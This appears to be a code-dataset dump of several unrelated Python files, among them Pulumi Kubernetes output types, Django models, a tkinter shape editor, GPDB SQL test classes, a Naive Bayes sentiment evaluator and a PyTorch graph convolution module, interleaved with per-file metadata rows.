if lastprehookjob is not None:
pulumi.set(__self__, "lastprehookjob", lastprehookjob)
if posthookjobshistory is not None:
pulumi.set(__self__, "posthookjobshistory", posthookjobshistory)
if prehookjobshistory is not None:
pulumi.set(__self__, "prehookjobshistory", prehookjobshistory)
@property
@pulumi.getter
def lastposthookjob(self) -> Optional[str]:
return pulumi.get(self, "lastposthookjob")
@property
@pulumi.getter
def lastprehookjob(self) -> Optional[str]:
return pulumi.get(self, "lastprehookjob")
@property
@pulumi.getter
def posthookjobshistory(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "posthookjobshistory")
@property
@pulumi.getter
def prehookjobshistory(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "prehookjobshistory")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionStatusStatuses(dict):
"""
    SubscriptionPerClusterStatus defines the status of a subscription in each cluster; the key is the package name
"""
def __init__(__self__, *,
packages: Optional[Mapping[str, 'outputs.SubscriptionStatusStatusesPackages']] = None):
"""
        SubscriptionPerClusterStatus defines the status of a subscription in each cluster; the key is the package name
"""
if packages is not None:
pulumi.set(__self__, "packages", packages)
@property
@pulumi.getter
def packages(self) -> Optional[Mapping[str, 'outputs.SubscriptionStatusStatusesPackages']]:
return pulumi.get(self, "packages")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionStatusStatusesPackages(dict):
"""
SubscriptionUnitStatus defines status of a unit (subscription or package)
"""
def __init__(__self__, *,
last_update_time: str,
message: Optional[str] = None,
phase: Optional[str] = None,
reason: Optional[str] = None,
resource_status: Optional[Mapping[str, Any]] = None):
"""
SubscriptionUnitStatus defines status of a unit (subscription or package)
        :param str phase: the phase is Propagated on the hub or Subscribed on the endpoint
"""
pulumi.set(__self__, "last_update_time", last_update_time)
if message is not None:
pulumi.set(__self__, "message", message)
if phase is not None:
pulumi.set(__self__, "phase", phase)
if reason is not None:
pulumi.set(__self__, "reason", reason)
if resource_status is not None:
pulumi.set(__self__, "resource_status", resource_status)
@property
@pulumi.getter(name="lastUpdateTime")
def last_update_time(self) -> str:
return pulumi.get(self, "last_update_time")
@property
@pulumi.getter
def message(self) -> Optional[str]:
return pulumi.get(self, "message")
@property
@pulumi.getter
def phase(self) -> Optional[str]:
"""
        The phase is Propagated on the hub or Subscribed on the endpoint
"""
return pulumi.get(self, "phase")
@property
@pulumi.getter
def reason(self) -> Optional[str]:
return pulumi.get(self, "reason")
@property
@pulumi.getter(name="resourceStatus")
def resource_status(self) -> Optional[Mapping[str, Any]]:
return pulumi.get(self, "resource_status")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
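Each output class above delegates attribute translation to `_tables.CAMEL_TO_SNAKE_CASE_TABLE`. A minimal self-contained sketch of that lookup pattern (the table entries below are illustrative, not the real generated table):

```python
# Hypothetical sketch of the _translate_property pattern used by the classes
# above: look up a camelCase wire name in a snake_case table, falling back to
# the name itself when there is no entry.
CAMEL_TO_SNAKE_CASE_TABLE = {
    "lastUpdateTime": "last_update_time",
    "resourceStatus": "resource_status",
}

def translate_property(prop):
    return CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
```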
| 49.648155 | 1,659 | 0.681598 | 17,478 | 141,249 | 5.383053 | 0.037647 | 0.022915 | 0.026944 | 0.039379 | 0.857714 | 0.841675 | 0.828782 | 0.805463 | 0.79729 | 0.781814 | 0 | 0.001764 | 0.229453 | 141,249 | 2,844 | 1,660 | 49.665612 | 0.862678 | 0.461405 | 0 | 0.745027 | 1 | 0 | 0.134726 | 0.067178 | 0 | 0 | 0 | 0.007032 | 0 | 1 | 0.180229 | false | 0 | 0.003617 | 0.067511 | 0.364075 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
00f2c4d16451eb5efebcb6afd31950e7ef2a2caa | 566 | py | Python | dc_campaign_finance_data_processor/processor/models.py | codefordc/dc-campaign-finance-data-processor | c4d9d5f1d518f91bfc0321e3bb501bcf2392347b | [
"MIT"
] | 1 | 2015-09-22T23:43:46.000Z | 2015-09-22T23:43:46.000Z | dc_campaign_finance_data_processor/processor/models.py | codefordc/dc-campaign-finance-data-processor | c4d9d5f1d518f91bfc0321e3bb501bcf2392347b | [
"MIT"
] | null | null | null | dc_campaign_finance_data_processor/processor/models.py | codefordc/dc-campaign-finance-data-processor | c4d9d5f1d518f91bfc0321e3bb501bcf2392347b | [
"MIT"
] | null | null | null | from django.db import models
class Record(models.Model):
name = models.CharField(max_length=200)
clean_name = models.CharField(max_length=200)
grouped_name = models.CharField(max_length=200)
address = models.CharField(max_length=200)
clean_address = models.CharField(max_length=200)
def __str__(self):
return self.name + ' ' + self.address
class Grouping(models.Model):
name = models.CharField(max_length=200)
address = models.CharField(max_length=200)
def __str__(self):
return self.name + ' ' + self.address
| 29.789474 | 52 | 0.708481 | 74 | 566 | 5.175676 | 0.283784 | 0.274151 | 0.328982 | 0.438642 | 0.856397 | 0.856397 | 0.749347 | 0.749347 | 0.610966 | 0.610966 | 0 | 0.045356 | 0.181979 | 566 | 18 | 53 | 31.444444 | 0.781857 | 0 | 0 | 0.571429 | 0 | 0 | 0.003534 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.071429 | 0.142857 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 10 |
970627f33c9ef18d558942756094d05ec9262bb0 | 79 | py | Python | bayes_race/params/__init__.py | DaniMarts/bayesrace | 3d0d2b26dac2e33ad7e38513304cfb259abe351c | [
"MIT"
] | 23 | 2020-03-27T03:28:04.000Z | 2022-02-24T11:21:18.000Z | bayes_race/params/__init__.py | DaniMarts/bayesrace | 3d0d2b26dac2e33ad7e38513304cfb259abe351c | [
"MIT"
] | 1 | 2021-07-08T22:02:15.000Z | 2021-07-08T22:02:15.000Z | bayes_race/params/__init__.py | DaniMarts/bayesrace | 3d0d2b26dac2e33ad7e38513304cfb259abe351c | [
"MIT"
] | 17 | 2020-10-27T06:09:34.000Z | 2022-03-23T05:28:23.000Z | from bayes_race.params.f110 import F110
from bayes_race.params.orca import ORCA | 39.5 | 39 | 0.860759 | 14 | 79 | 4.714286 | 0.5 | 0.272727 | 0.393939 | 0.575758 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0.088608 | 79 | 2 | 40 | 39.5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
976608fbf08ad15e8f6e9b029472eceb514e5ee0 | 11,926 | py | Python | objects.py | clima-dev/Tyro-Engine | c06a72159838e1c2673aef617fb51b92c7e6333f | [
"Apache-2.0"
] | 5 | 2021-12-21T20:40:40.000Z | 2022-01-03T15:28:03.000Z | objects.py | clima-dev/Tyro-Engine | c06a72159838e1c2673aef617fb51b92c7e6333f | [
"Apache-2.0"
] | 2 | 2021-12-29T19:16:15.000Z | 2021-12-31T06:22:16.000Z | objects.py | clima-dev/Tyro-Engine | c06a72159838e1c2673aef617fb51b92c7e6333f | [
"Apache-2.0"
] | 2 | 2021-12-31T10:11:23.000Z | 2021-12-31T16:17:41.000Z | import tkinter as tk
import pygame
from PIL import Image as img
import PIL
from datetime import datetime
import shutil
import os
import random
class Image:
def __init__(
self,
id,
image,
canvas,
x=0,
y=0,
width=None,
height=None,
scale=1,
loaded=False,
path=None,
):
self.x = x
self.y = y
self.id = str(id)
self.scale = scale
self.name = (
image.split("/")[-1].split(".")[0] + "_" + str(id)
if not loaded
else image.split("/")[-1].split(".")[0]
)
self.canvas = canvas
self.ext = image.split("/")[-1].split(".")[-1]
self.type = "image"
file = self.name + "." + self.ext
if loaded:
self.currentDir = path
elif path != None:
self.currentDir = path + "/assets"
if not loaded:
shutil.copy(image, f"{self.currentDir}/{file}")
shutil.copy(image, f"{self.currentDir}/edited/{file}")
self.unedited = r"{currentDir}/{file}".format(
currentDir=self.currentDir, file=file
)
self.edited = r"{currentDir}/edited/{file}".format(
currentDir=self.currentDir, file=file
)
openedImage = img.open(self.unedited)
self.width, self.height = openedImage.size
self.file = tk.PhotoImage(file=self.edited)
self.path = self.unedited
def changeName(self, name, objects):
if name not in objects.keys():
self.name = name
os.rename(
self.unedited,
r"{currentDir}/{name}.{ext}".format(
currentDir=self.currentDir,
name=name,
ext=self.unedited.split("/")[-1].split(".")[-1],
),
)
self.unedited = r"{currentDir}/{name}.{ext}".format(
currentDir=self.currentDir,
name=name,
ext=self.unedited.split("/")[-1].split(".")[-1],
)
self.path = self.unedited
os.rename(
self.edited,
r"{currentDir}/edited/{name}.{ext}".format(
currentDir=self.currentDir,
name=name,
ext=self.edited.split("/")[-1].split(".")[-1],
),
)
self.edited = r"{currentDir}/edited/{name}.{ext}".format(
currentDir=self.currentDir,
name=name,
ext=self.edited.split("/")[-1].split(".")[-1],
)
    def changeX(self, x):
        # canvas.move is relative, so move by the delta from the old position
        self.canvas.move(self.canvasObject, x - self.x, 0)
        self.x = x

    def changeY(self, y):
        self.canvas.move(self.canvasObject, 0, y - self.y)
        self.y = y
def changeWidth(self, width):
self.width = width
image = img.open(self.unedited)
image = image.resize(
(int(self.width * self.scale), int(self.height * self.scale))
)
image.save(self.edited)
self.file = tk.PhotoImage(file=self.edited)
def changeHeight(self, height):
self.height = height
image = img.open(self.unedited)
image = image.resize(
(int(self.width * self.scale), int(self.height * self.scale))
)
image.save(self.edited)
self.file = tk.PhotoImage(file=self.edited)
def changeScale(self, scale):
self.scale = scale
image = img.open(self.unedited)
image = image.resize(
(int(self.width * self.scale), int(self.height * self.scale))
)
image.save(self.edited)
self.file = tk.PhotoImage(file=self.edited)
def createCanvasImage(self):
self.canvasObject = self.canvas.create_image(
(self.x, self.y), anchor="nw", image=self.file
)
def delete(self):
self.canvas.delete(self.canvasObject)
os.remove(self.unedited)
os.remove(self.edited)
class Ellipse:
def __init__(
self,
id,
canvas,
x=0,
y=0,
width=75,
height=75,
color="#9c9c9c",
name="",
scale=1,
):
self.x = x
self.y = y
self.width = width
self.height = height
self.color = color
self.id = str(id)
self.canvas = canvas
self.scale = scale
self.type = "ellipse"
self.tab = None
if name != "":
self.name = name
else:
self.name = "ellipse_" + str(id)
def changeName(self, name, objects):
if name not in objects.keys():
self.name = name
def changeX(self, x):
self.canvas.move(self.canvasObject, x - self.x, 0)
self.x = x
def changeY(self, y):
self.canvas.move(self.canvasObject, 0, y - self.y)
self.y = y
def changeScale(self, scale):
self.scale = scale
self.width = self.width * self.scale
self.height = self.height * self.scale
def changeWidth(self, width):
self.width = width
def changeHeight(self, height):
self.height = height
def changeColor(self, color):
self.color = color
self.canvas.itemconfig(self.canvasObject, fill=self.color)
def createCanvasObject(self):
self.canvasObject = self.canvas.create_oval(
self.x, self.y, self.x + self.width, self.y + self.height, fill=self.color
)
def updateObject(self):
        try:
            self.canvas.delete(self.canvasObject)
        except Exception:
            # the canvas object may not exist yet on the first update
            pass
self.canvasObject = self.canvas.create_oval(
self.x, self.y, self.x + self.width, self.y + self.height, fill=self.color
)
def delete(self):
self.canvas.delete(self.canvasObject)
class Rectangle:
def __init__(
self,
id,
canvas,
x=0,
y=0,
width=75,
height=75,
color="#9c9c9c",
name="",
scale=1,
):
self.x = x
self.y = y
self.width = width
self.height = height
self.color = color
self.id = str(id)
self.canvas = canvas
self.scale = scale
self.type = "rectangle"
self.tab = None
if name != "":
self.name = name
else:
self.name = "rectangle_" + str(id)
def changeName(self, name, objects):
if name not in objects.keys():
self.name = name
def changeX(self, x):
self.canvas.move(self.canvasObject, x - self.x, 0)
self.x = x
def changeY(self, y):
self.canvas.move(self.canvasObject, 0, y - self.y)
self.y = y
def changeScale(self, scale):
self.scale = scale
self.width = self.width * self.scale
self.height = self.height * self.scale
def changeWidth(self, width):
self.width = width
def changeHeight(self, height):
self.height = height
def changeColor(self, color):
self.color = color
self.canvas.itemconfig(self.canvasObject, fill=self.color)
def createCanvasObject(self):
self.canvasObject = self.canvas.create_rectangle(
self.x, self.y, self.x + self.width, self.y + self.height, fill=self.color
)
def updateObject(self):
        try:
            self.canvas.delete(self.canvasObject)
        except Exception:
            # the canvas object may not exist yet on the first update
            pass
self.canvasObject = self.canvas.create_rectangle(
self.x, self.y, self.x + self.width, self.y + self.height, fill=self.color
)
def delete(self):
self.canvas.delete(self.canvasObject)
class Line:
def __init__(
self,
id,
canvas,
x=0,
y=0,
width=75,
height=75,
color="#9c9c9c",
name="",
scale=1,
thickness=5,
):
self.x = x
self.y = y
self.width = width
self.height = height
self.color = color
self.id = str(id)
self.canvas = canvas
self.scale = scale
self.thickness = thickness
self.type = "line"
self.tab = None
if name != "":
self.name = name
else:
self.name = "line_" + str(id)
def changeName(self, name, objects):
if name not in objects.keys():
self.name = name
def changeX(self, x):
self.canvas.move(self.canvasObject, x - self.x, 0)
self.x = x
def changeY(self, y):
self.canvas.move(self.canvasObject, 0, y - self.y)
self.y = y
def changeScale(self, scale):
self.scale = scale
self.width = self.width * self.scale
self.height = self.height * self.scale
def changeWidth(self, width):
self.width = width
def changeHeight(self, height):
self.height = height
def changeColor(self, color):
self.color = color
self.canvas.itemconfig(self.canvasObject, fill=self.color)
def changeThickness(self, thickness):
self.thickness = thickness
self.canvas.itemconfig(self.canvasObject, width=self.thickness)
def createCanvasObject(self):
self.canvasObject = self.canvas.create_line(
self.x,
self.y,
self.x + self.width,
self.y + self.height,
fill=self.color,
width=self.thickness,
)
def updateObject(self):
        try:
            self.canvas.delete(self.canvasObject)
        except Exception:
            # the canvas object may not exist yet on the first update
            pass
self.canvasObject = self.canvas.create_line(
self.x,
self.y,
self.x + self.width,
self.y + self.height,
fill=self.color,
width=self.thickness,
)
def delete(self):
self.canvas.delete(self.canvasObject)
class Text:
def __init__(
self,
id,
canvas,
x=0,
y=0,
text="Text",
font="Arial",
size=12,
color="#000000",
name="",
):
self.x = x
self.y = y
self.color = color
self.id = id
self.canvas = canvas
self.type = "text"
self.tab = None
self.id = str(id)
if name != "":
self.name = name
else:
self.name = "text_" + str(id)
self.text = text
self.font = font
self.size = size
def changeName(self, name, objects):
if name not in objects.keys():
self.name = name
def changeX(self, x):
self.canvas.move(self.canvasObject, x - self.x, 0)
self.x = x
def changeY(self, y):
self.canvas.move(self.canvasObject, 0, y - self.y)
self.y = y
def changeText(self, text):
self.text = text
self.canvas.itemconfig(self.canvasObject, text=self.text)
def changeColor(self, color):
self.color = color
self.canvas.itemconfig(self.canvasObject, fill=self.color)
def changeFont(self, font):
self.font = font
self.canvas.itemconfig(self.canvasObject, font=(self.font, self.size))
def changeSize(self, size):
self.size = size
self.canvas.itemconfig(self.canvasObject, font=(self.font, self.size))
def updateObject(self):
        try:
            self.canvas.delete(self.canvasObject)
        except Exception:
            # the canvas object may not exist yet on the first update
            pass
self.canvasObject = self.canvas.create_text(
self.x, self.y, text=self.text, font=(
self.font, self.size), fill=self.color
)
def createCanvasObject(self):
self.canvasObject = self.canvas.create_text(
self.x, self.y, text=self.text, font=(
self.font, self.size), fill=self.color
)
def delete(self):
self.canvas.delete(self.canvasObject)
| 26.8 | 86 | 0.528258 | 1,369 | 11,926 | 4.577064 | 0.073046 | 0.065432 | 0.031599 | 0.017555 | 0.842643 | 0.805298 | 0.787265 | 0.746409 | 0.73045 | 0.719279 | 0 | 0.008497 | 0.348734 | 11,926 | 444 | 87 | 26.86036 | 0.798249 | 0 | 0 | 0.775457 | 0 | 0 | 0.027922 | 0.016351 | 0 | 0 | 0 | 0 | 0 | 1 | 0.140992 | false | 0.010444 | 0.020888 | 0 | 0.174935 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c100012687c72e9a043e72c2c6d7e3d537152647 | 2,235 | py | Python | src/test/tinc/tincrepo/ddl/default_distribution/test_create_table_default_distribution.py | lintzc/GPDB | b48c8b97da18f495c10065d0853db87960aebae2 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | src/test/tinc/tincrepo/ddl/default_distribution/test_create_table_default_distribution.py | lintzc/GPDB | b48c8b97da18f495c10065d0853db87960aebae2 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | src/test/tinc/tincrepo/ddl/default_distribution/test_create_table_default_distribution.py | lintzc/GPDB | b48c8b97da18f495c10065d0853db87960aebae2 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | from mpp.models import SQLTestCase
class test_create_table_default_distribution(SQLTestCase):
'''
testing CREATE TABLE with default distribution
@author garcic12
@created 2014-07-01 18:09:00
@description test CREATE TABLE with default distribution
@gpopt 1.510
@gucs gp_create_table_random_default_distribution=on
@tags CTAS HAWQ ORCA
@product_version gpdb: 4.3.99.99, [4.3-], 4.3.2.0ORCA1, hawq: [1.3-]
'''
sql_dir = 'sql/'
ans_dir = 'expected/'
out_dir = 'out/'
class test_create_table_default_distribution_GPDB(SQLTestCase):
'''
testing CREATE TABLE with default distribution
@author garcic12
@created 2014-07-01 18:09:00
@description test CREATE TABLE with default distribution
@gpopt 1.510
@gucs gp_create_table_random_default_distribution=on
@tags CTAS ORCA
@product_version gpdb: 4.3.99.99, [4.3-], 4.3.2.0ORCA1
'''
sql_dir = 'sql_gpdb/'
ans_dir = 'expected/'
out_dir = 'out/'
class test_create_table_default_distribution_On(SQLTestCase):
'''
testing CREATE TABLE with default distribution
@author garcic12
@created 2014-07-01 18:09:00
@tags CTAS HAWQ ORCA
@product_version gpdb: 4.3.99.99, [4.3-], 4.3.2.0ORCA1, hawq: [1.3-]
@description test CREATE TABLE with default distribution
@gpopt 1.510
@gucs gp_create_table_random_default_distribution=on
'''
sql_dir = 'sql_default_distribution_sensitive/'
ans_dir = 'expected_default_distribution_On/'
out_dir = 'out/'
class test_create_table_default_distribution_Off(SQLTestCase):
'''
testing CREATE TABLE with default distribution
@author garcic12
@created 2014-07-01 18:09:00
@description test CREATE TABLE with default distribution
@gpopt 1.510
@gucs gp_create_table_random_default_distribution=off
@tags CTAS HAWQ ORCA
@product_version gpdb: 4.3.99.99, [4.3-], 4.3.2.0ORCA1, hawq: [1.3-]
'''
sql_dir = 'sql_default_distribution_sensitive/'
ans_dir = 'expected_default_distribution_Off/'
out_dir = 'out/'
| 32.867647 | 75 | 0.657271 | 293 | 2,235 | 4.78157 | 0.167235 | 0.271235 | 0.085653 | 0.125625 | 0.950749 | 0.950749 | 0.922912 | 0.922912 | 0.922912 | 0.888651 | 0 | 0.082339 | 0.250112 | 2,235 | 67 | 76 | 33.358209 | 0.75358 | 0.53915 | 0 | 0.470588 | 0 | 0 | 0.246319 | 0.1834 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
c10e601743c5ddb576107e170bf475326045cc94 | 4,296 | py | Python | evaluate.py | sm4536/sentiment_analyser_Naive_Bayes | 50994d4f287ba97a4009e383d2f9e1d564a10b18 | [
"Apache-2.0"
] | null | null | null | evaluate.py | sm4536/sentiment_analyser_Naive_Bayes | 50994d4f287ba97a4009e383d2f9e1d564a10b18 | [
"Apache-2.0"
] | null | null | null | evaluate.py | sm4536/sentiment_analyser_Naive_Bayes | 50994d4f287ba97a4009e383d2f9e1d564a10b18 | [
"Apache-2.0"
] | null | null | null | import os
import shutil
import sys
from split_and_shuffle_data import Split_Data
datasetName = sys.argv[1]
Split_Data.splitdata(datasetName)
from bayes import Bayes_Classifier
trainDir = "training/"
testDir = "testing/"
bc = Bayes_Classifier(trainDir)
print("\n ------------------------Running the Bayes Classifier-------------------")
iFileList = []
for fFileObj in os.walk(testDir + "/"):
iFileList = fFileObj[2]
break
results = {"negative": 0, "neutral": 0, "positive": 0}
true_negatives_count = 0
true_positives_count = 0
false_negatives_count = 0
false_positive_count = 0
for filename in iFileList:
try:
fileText = bc.loadFile(testDir + filename)
classifier_result = bc.classify(fileText)
original_result = filename.split('-')[1]
    except Exception:
        # skip files that fail to load or classify; otherwise the variables
        # used below would be unbound or stale from the previous iteration
        print(filename)
        continue
if original_result == '1' and classifier_result == 'negative':
true_negatives_count += 1
elif original_result == '1' and classifier_result != 'negative':
false_negatives_count += 1
elif original_result == '5' and classifier_result == 'positive':
true_positives_count += 1
elif original_result == '5' and classifier_result != 'positive':
false_positive_count += 1
results[classifier_result] += 1
print("\nResults Summary:")
for r in results:
print("%s: %d" % (r, results[r]))
# total correct and incorrect predictions across both classes
correct_count = true_positives_count + true_negatives_count
incorrect_count = false_positive_count + false_negatives_count

# Calculate and report accuracy, precision, recall, and F-measure
Accuracy = 100 * correct_count / (correct_count + incorrect_count)
precision = 100 * true_positives_count / (true_positives_count + false_positive_count)
Recall = 100 * true_positives_count / (true_positives_count + false_negatives_count)
fMeasure = (2 * precision * Recall) / (precision + Recall)
print("Classification Accuracy: %.2f%%" % Accuracy)
print("Classification Precision: %.2f%%" % precision)
print("Classification Recall: %.2f%%" % Recall)
print("Classification F-measure: %.2f%%" % fMeasure)
print("\n -------------------------Bayes Classifier End---------------------------")
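The metric arithmetic above is repeated for both classifiers; it can be factored into one small helper. A minimal sketch (the function name and argument order are hypothetical, not part of the script):

```python
# Sketch of the accuracy / precision / recall / F-measure arithmetic above,
# expressed over raw confusion-matrix counts. Values are percentages.
def compute_metrics(tp, tn, fp, fn):
    accuracy = 100 * (tp + tn) / (tp + tn + fp + fn)
    precision = 100 * tp / (tp + fp)
    recall = 100 * tp / (tp + fn)
    f_measure = (2 * precision * recall) / (precision + recall)
    return accuracy, precision, recall, f_measure
```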
#-----------------------------------------------------------------------
import os
from bayes_best import Bayes_Best_Classifier
trainDir = "training/"
testDir = "testing/"
bc = Bayes_Best_Classifier(trainDir)
print("\n ------------------------Running Best Bayes Classifier-------------------")
iFileList = []
for fFileObj in os.walk(testDir + "/"):
iFileList = fFileObj[2]
break
results = {"negative": 0, "neutral": 0, "positive": 0}
true_negatives_count = 0
true_positives_count = 0
false_negatives_count = 0
false_positive_count = 0
for filename in iFileList:
try:
fileText = bc.loadFile(testDir + filename)
classifier_result = bc.classify(fileText)
original_result = filename.split('-')[1]
    except Exception:
        # skip files that fail to load or classify; otherwise the variables
        # used below would be unbound or stale from the previous iteration
        print(filename)
        continue
if original_result == '1' and classifier_result == 'negative':
true_negatives_count += 1
elif original_result == '1' and classifier_result != 'negative':
false_negatives_count += 1
elif original_result == '5' and classifier_result == 'positive':
true_positives_count += 1
elif original_result == '5' and classifier_result != 'positive':
false_positive_count += 1
results[classifier_result] += 1
print("\nBest Results Summary:")
for r in results:
print("%s: %d" % (r, results[r]))
# total correct and incorrect predictions across both classes
correct_count = true_positives_count + true_negatives_count
incorrect_count = false_positive_count + false_negatives_count

# Calculate and report accuracy, precision, recall, and F-measure
Accuracy = 100 * correct_count / (correct_count + incorrect_count)
precision = 100 * true_positives_count / (true_positives_count + false_positive_count)
Recall = 100 * true_positives_count / (true_positives_count + false_negatives_count)
fMeasure = (2 * precision * Recall) / (precision + Recall)
print("Best Classification Accuracy: %.2f%%" % Accuracy)
print("Best Classification Precision: %.2f%%" % precision)
print("Best Classification Recall: %.2f%%" % Recall)
print("Best Classification F-measure: %.2f%%" % fMeasure)
print("\n ------------Best Bayes Classifier End--------------------")
| 32.793893 | 88 | 0.679702 | 495 | 4,296 | 5.644444 | 0.145455 | 0.100215 | 0.090193 | 0.038654 | 0.907659 | 0.807445 | 0.807445 | 0.7466 | 0.7466 | 0.7466 | 0 | 0.018001 | 0.159451 | 4,296 | 130 | 89 | 33.046154 | 0.755746 | 0.040968 | 0 | 0.757895 | 0 | 0 | 0.186832 | 0.04932 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.073684 | 0 | 0.073684 | 0.189474 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c1436219ada8335a745841ee88460ce6750ae703 | 29,085 | py | Python | Multi_gcn.py | chenjiehu/MGCN_ODA | 311a71444d6e22d4049d7356c1aa31584857006c | [
"MIT"
] | null | null | null | Multi_gcn.py | chenjiehu/MGCN_ODA | 311a71444d6e22d4049d7356c1aa31584857006c | [
"MIT"
] | null | null | null | Multi_gcn.py | chenjiehu/MGCN_ODA | 311a71444d6e22d4049d7356c1aa31584857006c | [
"MIT"
] | null | null | null | import os
os.environ['CUDA_LAUNCH_BLOCKING'] = "1"
import torch.nn as nn
from torch.nn import functional as F
import torch
import torch.nn.init as init
import numpy as np
from torch.nn.parameter import Parameter
class GraphConvolution(nn.Module):
def __init__(self, input_dim, output_dim, use_bias=True):
        """Graph convolution: L * X * \theta

        Args:
        ----------
        input_dim: int
            dimension of the input node features
        output_dim: int
            dimension of the output features
        use_bias : bool, optional
            whether to use a bias term
        """
super(GraphConvolution, self).__init__()
self.input_dim = input_dim
self.output_dim = output_dim
self.use_bias = use_bias
self.weight = nn.Parameter(torch.Tensor(input_dim, output_dim))
if self.use_bias:
self.bias = nn.Parameter(torch.Tensor(output_dim))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
init.kaiming_uniform_(self.weight)
if self.use_bias:
init.zeros_(self.bias)
def forward(self, adjacency, input_feature):
        """The adjacency matrix is sparse, so sparse matrix multiplication is used here.

        Args:
        -------
        adjacency: torch.sparse.FloatTensor
            adjacency matrix
        input_feature: torch.Tensor
            input features
        """
support = torch.mm(input_feature, self.weight)
output = torch.mm(adjacency, support)
if self.use_bias:
output += self.bias
return output
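The propagation rule implemented by `GraphConvolution.forward` is output = A · (X · W), plus an optional bias. A dependency-free sketch of the same rule on plain nested lists, assuming no bias (helper names are hypothetical):

```python
# Pure-Python sketch of the rule in GraphConvolution.forward:
# support = X * W, then output = A * support. Matrices are lists of rows.
def matmul(a, b):
    return [[sum(x * y for x, y in zip(row, col)) for col in zip(*b)]
            for row in a]

def gcn_layer(adjacency, features, weight):
    support = matmul(features, weight)   # X * W
    return matmul(adjacency, support)    # A * (X * W)
```

With the identity adjacency and identity weight, the layer leaves the features unchanged; a permutation adjacency reorders the node rows.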
class Graphprogate(nn.Module):
def __init__(self, input_dim, output_dim, use_bias=True):
        """Graph propagation: L * X (no learned weight matrix)

        Args:
        ----------
        input_dim: int
            dimension of the input node features
        output_dim: int
            dimension of the output features
        use_bias : bool, optional
            whether to use a bias term
        """
super(Graphprogate, self).__init__()
self.input_dim = input_dim
self.output_dim = output_dim
self.use_bias = use_bias
if self.use_bias:
self.bias = nn.Parameter(torch.Tensor(output_dim))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
if self.use_bias:
init.zeros_(self.bias)
def forward(self, adjacency, input_feature):
        """The adjacency matrix is sparse, so sparse matrix multiplication is used here.

        Args:
        -------
        adjacency: torch.sparse.FloatTensor
            adjacency matrix
        input_feature: torch.Tensor
            input features
        """
output = torch.mm(adjacency, input_feature)
if self.use_bias:
output += self.bias
return output
# Improvement 4: multi-graph GCN with A + A^2, final version
class MultiGCN_512(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(512)
self.gcn = GraphConvolution(input_dim, 512)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 512))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
A = self.MultiAdjacencyCompute(features)
x = self.gcn(A, features)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
